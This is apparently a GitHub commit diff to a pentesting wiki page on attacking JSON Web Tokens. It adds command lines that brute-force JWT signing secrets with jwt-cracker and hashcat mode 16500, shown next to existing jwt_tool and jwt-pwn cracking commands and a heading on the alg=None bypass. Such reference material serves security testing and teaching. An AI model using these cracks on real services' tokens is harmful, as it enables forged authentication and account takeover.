We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 522c1e0 commit 8f8eb9fCopy full SHA for 8f8eb9f
pentesting-web/hacking-jwt-json-web-tokens.md
@@ -62,6 +62,12 @@ python3 jwt_tool.py -d wordlists.txt <JWT token>
62
63
#https://github.com/mazen160/jwt-pwn
64
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
65
+
66
+#https://github.com/lmammino/jwt-cracker
67
+jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
68
69
+#hashcat
70
+hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
71
```
72
73
## Modify the algorithm to None \(CVE-2015-9235\)
0 commit comments